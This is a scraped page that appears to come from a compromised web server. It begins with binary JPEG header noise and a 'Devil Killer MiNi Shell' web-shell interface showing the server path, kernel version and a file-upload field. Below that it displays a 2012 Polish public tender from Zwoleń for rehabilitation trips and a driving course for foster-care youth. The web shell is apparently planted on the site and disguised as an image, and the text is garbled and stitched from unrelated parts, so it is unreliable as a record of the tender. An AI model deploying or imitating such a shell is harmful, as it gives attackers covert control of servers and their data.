JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120918/353388-N-2012.html

<p class="kh_header"><b>Zwoleń: Zorganizowanie i przeprowadzenie wyjazdu z programem rehabilitacyjno - integracyjnym dla osób niepełnosprawnych i ich opiekunów, wyjazdu z programem integracyjno - szkoleniowego  dla dzieci z rodzin zastępczych i opiekunów, kursu prawa jazdy Kat.B dla pełnoletnich osób z rodzin zastępczych i placówek opiekuńczo-wychowawczych uczestników projektu systemowego My samodzielni realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki,</b><br>
<b>Numer ogłoszenia: 353388 - 2012; data zamieszczenia: 18.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Zwoleniu , ul. Władysława Jagiełły 4, 26-700 Zwoleń, woj. mazowieckie, tel. 48 676 33 89 wew. 15, faks 48 676 36 23.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie wyjazdu z programem rehabilitacyjno - integracyjnym dla osób niepełnosprawnych i ich opiekunów, wyjazdu z programem integracyjno - szkoleniowego  dla dzieci z rodzin zastępczych i opiekunów, kursu prawa jazdy Kat.B dla pełnoletnich osób z rodzin zastępczych i placówek opiekuńczo-wychowawczych uczestników projektu systemowego My samodzielni realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego zamówienia jest: zorganizowanie i przeprowadzenie 14 dniowego wyjazdu  z programem rehabilitacyjno - integracyjnym dla 30 osób niepełnosprawnych i 15 ich opiekunów,  7 dniowego wyjazdu integracyjno-szkoleniowego dla 6 dzieci z rodzin zastępczych i 6 ich opiekunów oraz Kursu prawa jazdy Kat.B dla 10 pełnoletnich osób z rodzin zastępczych i placówek opiekuńczo-wychowawczych będących uczestnikami  projektu systemowego My samodzielni  realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.  
2 Zamawiający powyższe zamówienie podzielił na III części i dopuszcza składanie ofert częściowych. Wykonawca biorący udział w niniejszym postępowaniu może zrealizować całość zamówienia lub poszczególną jego część:
3.Część I zamówienia - 14 dniowy   wyjazd z programem  rehabilitacyjno- integracyjnym dla 45 osób  (30 osób niepełnosprawnych w tym poruszające się na wózkach inwalidzkich i 15 ich opiekunów) ze szkoleniem z zakresu rozwoju aktywności zawodowej i społecznej w ilości 30 godzin zajęć zespołowych i 30 godzin indywidualnego doradztwa zawodowego ( po 1 godz. dla każdej osoby niepełnosprawnej)
z następującymi dysfunkcjami lub schorzeniami:
- z dysfunkcją narządu ruchu osób poruszających się na wózkach inwalidzkich;
- z dysfunkcją narządu ruchu, z wyłączeniem osób poruszających się na wózkach inwalidzkich;
- z chorobami neurologicznymi;
4. Wykonawca zobowiązany jest zrealizować przedmiot zamówienia zgodnie z ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnieniu osób niepełnosprawnych ( Dz. U. z 2011 r. Nr 127, poz. 721 ze zm.) oraz rozporządzeniem Ministra Pracy i Polityki Społecznej w sprawie turnusów rehabilitacyjnych z dnia 15 listopada 2007 r. ( Dz. U. z 2007 r. Nr 230, poz. 1694) a w  szczególności  zapewnić jego uczestnikom:
5 W zakresie położenia ośrodka:
a) zakwaterowania w jednym obiekcie sanatoryjnym lub wypoczynkowym ( dla całej grupy) uprawnionym do realizacji niniejszego zamówienia, zlokalizowanym w odległości max. 200 km. Od siedziby Zamawiającego ( Zwolenia) położonym nad akwenem wodnym ( np. rzeka, jezioro itp.).
b) wszystkie pomieszczenia ogólnodostępne, z których korzystać będą uczestnicy m.in. stołówka, baza rekreacyjna, baza zabiegowa itp, dostosowane do potrzeb osób poruszających się na wózkach inwalidzkich ( np. winda, podjazd itp.)
6W zakresie zakwaterowania:
a) rozlokowania wszystkich uczestników w pokojach 2 lub 3 osobowych z pełnym węzłem sanitarnym ( tj: umywalka, prysznic, wc, z całodobowym dostępem do ciepłej i zimnej wody) zlokalizowanych na parterze ośrodka, wyposażonych w telewizor z pilotem, telefon, czajnik bezprzewodowy, ręczniki kąpielowe itp.
b) w przypadku zakwaterowania na piętrze niezbędne wyposażenie budynku w windę. Wykonawca musi dysponować również salą szkoleniową do przeprowadzenia zajęć z zakresu rozwoju aktywności zawodowej i społecznej.
c) wyposażenie pokoi i łazienek w rozwiązania architektoniczne dostosowane do rodzaju niepełnosprawności (np. osób poruszających się na wózkach inwalidzkich)
d)zapewnienie obsługi sprzątającej dla utrzymania czystości w pokojach i węzłach sanitarnych oraz innych pomieszczeniach, z których będą korzystać uczestnicy wyjazdu.
7W zakresie wyżywienia:
a)  3 posiłki dziennie ( śniadanie, obiad dwudaniowy z deserem i kompotem, kolacja) w stołówce położonej na  terenie ośrodka, z zastrzeżeniem iż przyjazd uczestników do ośrodka rozpoczyna się obiadem.
b) w przypadku osób wymagających zastosowania specjalistycznej diety, zagwarantowanie zbilansowanych, urozmaiconych posiłków, dostosowanych do rodzaju schorzenia;
c) suchy prowiant na czas podróży w dniu wyjazdu;
d) żywienie uczestników pobytu powinno odbywać się zgodnie z zasadami racjonalnego żywienia i zasad higieny;
8W zakresie bazy rehabilitacyjno - zabiegowej:
a)  co najmniej 2 zabiegi dziennie przez min. 10 dni zabiegowych dla każdej osoby  niepełnosprawnej, według wskazań lekarza, dostosowane do rodzaju schorzenia lub dysfunkcji, zabiegi realizowane na terenie osrodka w którym zakwaterowani będą  uczestnicy wyjazdu;
b) wykwalifikowana kadra rehabilitantów i fizykoterapeutów;
c) badania  lekarskie na początku i na końcu  turnusu osób niepełnosprawnych;
d) całodobowa opieka pielęgniarska i lekarska ( lekarz i pielęgniarka na stałe przebywający w ośrodku)
e) w przypadku konieczności przewozu uczestnika do szpitala, gwarancja bezpłatnego transportu, opieki pielęgniarskiej lub lekarskiej;
9 W zakresie zaplecza rekreacyjno - rozrywkowego:
a) kadra gwarantująca prawidłową realizację programu wyjazdu, w tym opiekun odpowiedzialny za koordynację pobytu grupy w zakresie obsługi kulturalno- oświatowej;
b) zatrudnienie opiekuna ze strony Zamawiającego i pokrycie jego kosztów pobytu.
c) bogata oferta zajęć integracyjno - rozrywkowych ( ogniska, grillowanie, zabawy taneczne, wieczorki integracyjne wraz z poczęstunkiem odpowiednim do typu imprez)
d) co najmniej 2 wycieczki autokarowe, w trakcie których uczestnicy będą mogli zwiedzić okoliczne atrakcje przyrodnicze i historyczne .
e) uregulowanie wszelkich biletów wstępu, wejściówek opłat parkingowych itp;
f) bogata bezpłatna infrastruktura sportowa np.: boiska do piłki siatkowej, koszykowej, wypożyczalnia sprzętu sportowego, wypożyczalnia rowerów itp.;
g) zajęcia związane z przedmiotem zamówienia z uwzględnieniem rodzaju niepełnosprawności osób biorących w nich udział;
10W zakresie transportu:
a) przewóz uczestników ze Zwolenia do miejscowości w której położony jest ośrodek, oraz przywóz z ośrodka do Zwolenia po zakończeniu pobytu;
b) wykonawca zapewni sprawny  technicznie ( posiadający aktualny przegląd techniczny), komfortowo wyposażony autokar z klimatyzacją, toaletą, TV i nagłośnieniem;
c) wykonawca zapewni kierowcę posiadającego odpowiednie uprawnienia do prowadzenia pojazdu i aktualne badania lekarskie;
d) wykonawca poinformuje zamawiającego o terminie, miejscu i godzinie podstawienia autokaru w dniu wyjazdu ze Zwolenia w formie pisemnej najpóźniej na 5 dni przed planowanym terminem wyjazdu;
e) ubezpieczenia  NNW wszystkich uczestników na czas pobytu i przejazdu autokarowego w wysokości 10 tys. zł. przypadających na jednego uczestnika a w razie zaistnienia potrzeby sporządzenia protokołu okoliczności i przyczyn wypadku związanego z uczestnikiem jak i w drodze do i z  miejsca turnusu;
f) wykonawca jest zobowiązany do pełnienia roli opiekuna grupy podczas wyjazdu i wspierania osób przez cały okres pobytu;
2.7 W zakresie przeprowadzenia szkolenia:
a) wykonawca przeprowadzi 30 godz. grupowe szkolenie z zakresu rozwoju aktywności zawodowej i społecznej oraz 30 godz. indywidualnego doradztwa zawodowego ( po 1 godz. dla każdej osoby niepełnosprawnej)
b) tematyka szkolenia obejmuje:
- umiejętności komunikacji interpersonalnej;
- jak podnieść poczucie własnej wartości:
- jak wzmocnić pewność siebie;
- nabycie umiejętności radzenia sobie ze stresem;
- poruszanie się po rynku pracy;
- warunki zatrudnienia osób niepełnosprawnych oraz przysługujące im prawa i obowiązki;
- nauka konstruowania CV oraz listu motywacyjnego;
- nabywanie wiedzy z zakresu autoprezentacji;
c) w trakcie szkolenia poczęstunek w postaci suszu ciastkowego, napoi, owoców, kawy, herbaty.
d) Wykonawca na 5 dni przed planowanym wyjazdem przedstawi zamawiającemu, plan wyjazdu oraz program szkolenia.
11 Wymagania dodatkowe, związane z realizacją usługi:
a) opłata taksy klimatycznej za wszystkich uczestników, jeżeli wymagać będzie tego lokalizacja ośrodka miejscowości uzdrowiskowej;
b) oznakowania miejsc, z których korzystać będą uczestnicy projektu, poprzez umieszczenie plakatów informacyjnych dotyczących realizowanego projektu;
c) prowadzenie dokumentacji zdjęciowej i przekazania jej w formie zapisu cyfrowego na płycie CD Zamawiającemu po zakończeniu  zrealizowanej usługi;
d) zawiadomienie zamawiającego o każdym przypadku przerwania pobytu przez jego uczestnika;
e) przekazanie sprawozdania  w formie pisemnej  po jej zakończeniu   zawierającego opis przeprowadzonej usługi oraz innych dokumentów wymaganych  przez Zamawiającego, niezbędnych przy realizacji ww. projektu
f) W wyjeździe będzie dodatkowo uczestniczył  opiekuna ze strony Zamawiającego , którego koszty pokryje sam Zamawiający. 
g) Wykonawca pokryje koszty pobytu osób kontrolujących ze strony Zamawiającego;
h)  Podane w pkt 1 niniejszego załącznika ilości uczestników są szacunkowe a Zamawiający poda wstępną ilość osób na 5 dni przed rozpoczęciem realizacji usługi. Powiadomienie o wstępnej ilości uczestników nastąpi faksem lub pocztą elektroniczną na numer/adres podany przez Wykonawcę w ofercie.  Zamawiający zastrzega, że liczba uczestników i opiekunów może ulec zmianie (zwiększeniu lub zmniejszeniu) i tak:
-  jeżeli zamawiający zgłosi zmniejszenie ilości uczestników, najpóźniej do 1-go dnia przed umownym terminem rozpoczęcia usługi, to zamawiający nie poniesie kosztów umownych świadczeń przewidzianych dla tych uczestników, których nieobecność została zgłoszona;
- jeżeli zamawiający zgłosi zmniejszenie ilości uczestników w dniu rozpoczęcia usługi, to zapłaci umowną cenę świadczeń  przewidzianych, za pierwszą dobę w ośrodku dla tych osób;
- jeżeli zamawiający nie dokona zgłoszenia o zmniejszeniu ilości uczestników, zapłaci umowną cenę świadczeń przewidzianych dla danej osoby za wszystkie dni trwania usługi;
- jeżeli liczba osób zostanie zwiększona Zamawiający, dodatkowo pokryje koszty tych osób zgodnie z e złożoną w niniejszym postępowaniu ofertą.
-  Każdorazowa zmiana ilości osób uczestników projektu wymagać będzie formy pisemnej w postaci aneksu do umowy.
12 Część II zamówienia - 7 dniowy wyjazd integracyjno - szkoleniowy dla 6 dzieci z rodzin zastępczych i 6 ich opiekunów.
13Przedmiotem zamówienia jest: zorganizowanie i przeprowadzenie  7 dniowego wyjazdu integracyjno- szkoleniowego dla 6 dzieci z rodzin zastępczych i 6 ich opiekunów uczestników projektu systemowego My samodzielni realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.
14.Wykonawca zobowiązany jest zrealizować przedmiot zamówienia z należytą starannością, a w  szczególności  zapewnić jego uczestnikom:
15. W zakresie położenia ośrodka:
a) zakwaterowania w jednym ośrodku ( dla całej grupy) zlokalizowanym w odległości max. 200 km. od siedziby Zamawiającego ( Zwolenia) położonym nad akwenem wodnym ( np. rzeka, jezioro itp.).
b) wszystkie pomieszczenia ogólnodostępne, z których korzystać będą uczestnicy projektu m.in. stołówka, baza rekreacyjna, baza szkoleniowa;
16.W zakresie zakwaterowania:
a) rozlokowania wszystkich uczestników w pokojach 2 i 3  osobowych z pełnym węzłem sanitarnym ( tj: umywalka, prysznic, wc, z całodobowym dostępem do ciepłej i zimnej wody)  wyposażonych w telewizor z pilotem, telefon, czajnik bezprzewodowy, ręczniki kąpielowe itp.
b) Wykonawca musi dysponować również salą szkoleniową do przeprowadzenia zajęć z zakresu rozwoju kompetencji społecznych;
c)zapewnienie obsługi sprzątającej dla utrzymania czystości w pokojach i węzłach sanitarnych oraz innych pomieszczeniach, z których będą korzystać uczestnicy projektu
17.W zakresie wyżywienia:
a)  3 posiłki dziennie ( śniadanie, obiad dwudaniowy z deserem i kompotem, kolacja) w stołówce położonej na  terenie ośrodka, z zastrzeżeniem iż przyjazd uczestników do ośrodka rozpoczyna się obiadem.
b) suchy prowiant na czas podróży w dniu wyjazdu;
c) żywienie uczestników pobytu powinno odbywać się zgodnie z zasadami racjonalnego żywienia i zasad higieny;
18.W zakresie zaplecza rekreacyjno - rozrywkowego:
a) kadra gwarantująca prawidłową realizację programu wyjazdu, w tym opiekun odpowiedzialny za koordynację pobytu grupy w zakresie obsługi kulturalno- oświatowej;
b) bogata oferta zajęć integracyjno - rozrywkowych ( ogniska, grillowanie, wieczorki  taneczne,  wraz z poczęstunkiem odpowiednim do typu imprez)
c) co najmniej 2 wycieczki jednodniowe autokarowe w trakcie których uczestnicy będą mogli zwiedzić okoliczne atrakcje przyrodnicze i historyczne.
d) uregulowanie wszelkich biletów wstępu, wejściówek opłat parkingowych itp;
e) bogata bezpłatna infrastruktura sportowa np.: boiska do piłki siatkowej, koszykowej, wypożyczalnia sprzętu sportowego, wypożyczalnia rowerów itp.;
f) zorganizowanie czasu wolnego dla uczestników projektu; 
19.W zakresie transportu:
a) przewóz uczestników ze Zwolenia do miejscowości w której położony jest ośrodek, oraz przywóz z ośrodka do Zwolenia po zakończeniu pobytu;
b) wykonawca zapewni sprawny  technicznie ( posiadający aktualny przegląd techniczny), komfortowo wyposażony autokar z klimatyzacją, toaletą, TV i nagłośnieniem;
c) wykonawca zapewni kierowcę posiadającego odpowiednie uprawnienia do prowadzenia pojazdu i aktualne badania lekarskie;
d) wykonawca poinformuje zamawiającego o terminie, miejscu i godzinie podstawienia autokaru w dniu wyjazdu ze Zwolenia w formie pisemnej najpóźniej na 5 dni przed planowanym terminem wyjazdu;
e) ubezpieczenia  NNW wszystkich uczestników na czas pobytu i przejazdu autokarowego w wysokości 10 tys. zł. przypadających na jednego uczestnika a w razie zaistnienia potrzeby sporządzenia protokołu okoliczności i przyczyn wypadku związanego z uczestnikiem jak i w drodze do i z  miejsca turnusu;
f) wykonawca jest zobowiązany do pełnienia roli opiekuna grupy podczas wyjazdu i wspierania osób przez cały okres pobytu;
20.W zakresie przeprowadzenia szkolenia:
a) wykonawca przeprowadzi 10 godz. grupowe szkolenie z zakresu rozwoju kompetencji społecznej oraz 6 godz. indywidualnego doradztwa zawodowego ( po 1 godz. dla każdego dziecka) tematyka szkolenia obejmuje:
- rozpoznawanie osobistych kompetencji, umiejętności, mocnych stron niezbędnych do pracy z ludzmi;
- rozpoznawanie własnych  skutecznych strategii, wywieranie wpływu społecznego;
- stwarzanie wizji własnej pracy zawodowej;
- twórcze przekraczanie własnych ograniczeń;
- trening umiejętności optymalnego wyrażania własnego zdania, życzeń, uczuć, obmowy i krytyki;
- budowanie dobrych, bliskich relacji rodzinnych;
- asertywność, radzenie sobie ze stresem;
- kreatywne myślenie i twórcze rozwiązywanie konfliktów;
- znaczenie i istota komunikacji interpersonalnej;
b)  w trakcie szkolenia Wykonawca zapewni jego uczestnikom, poczęstunek w postaci suszu ciastkowego, napoi, owoców, kawy, herbaty.
c)  Wykonawca na 5 dni przed planowanym wyjazdem przedstawi zamawiającemu, plan wyjazdu oraz program szkolenia.
21.Wymagania dodatkowe, związane z realizacją usługi:
a) opłata taksy klimatycznej za wszystkich uczestników, jeżeli wymagać będzie tego lokalizacja ośrodka miejscowości uzdrowiskowej;
b) oznakowania miejsc, z których korzystać będą uczestnicy projektu, poprzez umieszczenie plakatów informacyjnych dotyczących realizowanego projektu;
c) prowadzenie dokumentacji zdjęciowej i przekazania jej w formie zapisu cyfrowego na płycie CD Zamawiającemu po zakończeniu  zrealizowanej usługi;
d) zawiadomienie zamawiającego o każdym przypadku przerwania pobytu przez jego uczestnika;
e) przekazanie sprawozdania  w formie pisemnej  po jej zakończeniu,   zawierającego opis przeprowadzonej usługi oraz innych dokumentów wymaganych  przez zamawiającego.
f)  Podane w pkt 1 niniejszego załącznika ilości uczestników są szacunkowe a Zamawiający poda wstępną ilość osób na 5 dni przed rozpoczęciem realizacji usługi. Powiadomienie o wstępnej ilości uczestników nastąpi faksem lub pocztą elektroniczną na numer/adres podany przez Wykonawcę w ofercie.                          Zamawiający zastrzega, że liczba uczestników i opiekunów może ulec zmianie i tak:
-  jeżeli zamawiający zgłosi zmniejszenie ilości uczestników, najpóźniej do 1-go dnia przed umownym terminem rozpoczęcia usługi, to zamawiający nie poniesie kosztów umownych świadczeń przewidzianych dla tych uczestników, których nieobecność została zgłoszona;
- jeżeli zamawiający zgłosi zmniejszenie ilości uczestników w dniu rozpoczęcia usługi, to zapłaci umowną cenę świadczeń  przewidzianych, za pierwszą dobę w ośrodku dla tych osób;
- jeżeli zamawiający nie dokona zgłoszenia o zmniejszeniu ilości uczestników, zapłaci umowną cenę świadczeń przewidzianych dla danej osoby za wszystkie dni trwania usługi;
-  każdorazowa zmiana ilości osób uczestników projektu wymagać będzie formy pisemnej w postaci aneksu do umowy.
g) Wykonawca jest zobowiązany poddać się kontroli ze strony PCPR oraz innym uprawnionym osobom ,oraz pokryje koszty pobytu tych osób.
22.Część III zamówienia- Kurs prawa jazdy Kat.B dla 10 pełnoletnich osób z rodzin zastępczych i placówek opiekuńczo- wychowawczych
1.	Przedmiotem zamówienia jest: zorganizowanie i przeprowadzenie  kursu prawa jazdy Kat. B dla 10 pełnoletnich osób z rodzin zastępczych i placówek opiekuńczo-wychowawczych uczestników projektu systemowego My samodzielni realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Zwoleniu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 23.Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.
24.Wykonawca zobowiązany jest zrealizować przedmiot zamówienia zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów ( dz. U. z 2005 r. Nr 217, poz. 1834 ze zm.)
25.Kurs będzie obejmował 30 godzin zajęć teoretycznych i 30 godzin indywidualnych zajęć praktycznych (tzw jazdy) dla każdego uczestnika projektu. Przez godz. jazdy należy rozumieć 60 min. ) Wykonawca w ramach realizacji niniejszego zamówienia przeprowadzi egzamin wewnętrzny i wyda zaświadczenie o ukończonym szkoleniu,  przed zgłoszeniem do egzaminu państwowego oraz badania lekarskie przed przystąpieniem do kursu dla każdego uczestnika. Koszt  pierwszego egzaminu państwowego i koszt badań lekarskich pokrywa Wykonawca.
26.Zajęcia teoretyczne Zamawiający wymaga, żeby odbywały się na terenie miasta Zwolenia, Wykonawca w złożonej ofercie poda dokładny adres realizacji niniejszego zamówienia. i przed podpisaniem umowy zobowiązany będzie przedstawić Zamawiającemu  szczegółowe informacje dotyczące lokalizacji budynku i sal wykładowych.
27.Wykonawca  zapewni uczestnikom szkolenia  niezbędne materiały dydaktyczne i piśmienne, które po zakończeniu szkolenia przejdą na ich własność;
28.Zajęcia powinny odbywać się od poniedziałku do piątku nie wcześniej niż od godz. 7:00 do godz. 18 :00. Zamawiający dopuszcza zajęcia w soboty i niedziele.
29.Zajęcia muszą być zorganizowane w odpowiednich pomieszczeniach z zapewnionym zapleczem do przeprowadzenia zajęć tj: posiadających odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy p poż..
30.Wykonawca podczas prowadzenia zajęć teoretycznych zapewni jego uczestnikom wyżywienie w postaci obiadu - II danie wraz z napojem oraz przerwy kawowe ( kawa, herbata, cukier, śmietanka do kawy, ciastka)
31.Wykonawca  ubezpieczy uczestników szkolenia od dnia rozpoczęcia szkolenia od następstw nieszczęśliwych wypadków , forma ubezpieczenia imienna, pełny zakres całodobowy), kserokopię polisy należy dostarczyć do zamawiającego najpóźniej na dwa dni przed planowanym rozpoczęciem szkolenia, a w przypadku kiedy okres od podpisania umowy do rozpoczęcia szkolenia będzie krótszy to w dniu rozpoczęcia szkolenia.. W przypadku zmiany osób uczestniczących w projekcie Wykonawca zobowiązany jest zapewnić ubezpieczenie nowym uczestnikom na własny koszt.
32.Wykonawca będzie zobowiązany do sporządzenia protokołów okoliczności i przyczyn wypadku przez zespół powypadkowy w razie gdy taki wypadek zaistniał w trakcie szkolenia u osoby skierowanej, lub w trakcie przejazdu tych osób.
33.Wykonawca będzie zobowiązany do prowadzenia niezbędnej dokumentacji związanej z realizacją projektu, a po zakończeniu kursu przekazania jej Zamawiającemu.
34.Wykonawca, pod rygorem utraty   prawa do zapłaty za  przeprowadzony kurs prawa jazdy kat. B zobowiązany będzie  do niezwłocznego poinformowania Zamawiającego o:
 a)  nie zgłoszeniu się uczestników na zajęcia;
  b)  przerwanie  lub  rezygnacja z uczestnictwa w kursie skierowanej osoby
  c)  innych sytuacjach, które mają wpływ na realizację programu  i umowy;
35.Wykonawca jest zobowiązany poddać się kontroli PCPR oraz innym uprawnionym  osobom.
36.Wykonawca będzie zobowiązany do właściwego oznakowania (oblogowania) sal  wykładowych ,list obecności, dzienników zajęć itp zgodnie z obowiązującymi przepisami dotyczącymi projektów współfinansowanych z Europejskiego Funduszu Społecznego
37.Zamawiający zastrzega, iż może ulec zmianie liczba uczestników kursu, wówczas  Zamawiający zapłaci Wykonawcy należność za faktyczną ilość  osób, które kurs ukończyły, stosownie do złożonej w prowadzonym postępowaniu oferty.
38.Prowadzenie dokumentacji zdjęciowej i przekazania jej w formie zapisu cyfrowego na płycie CD Zamawiającemu po zakończeniu  zrealizowanej usługi;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

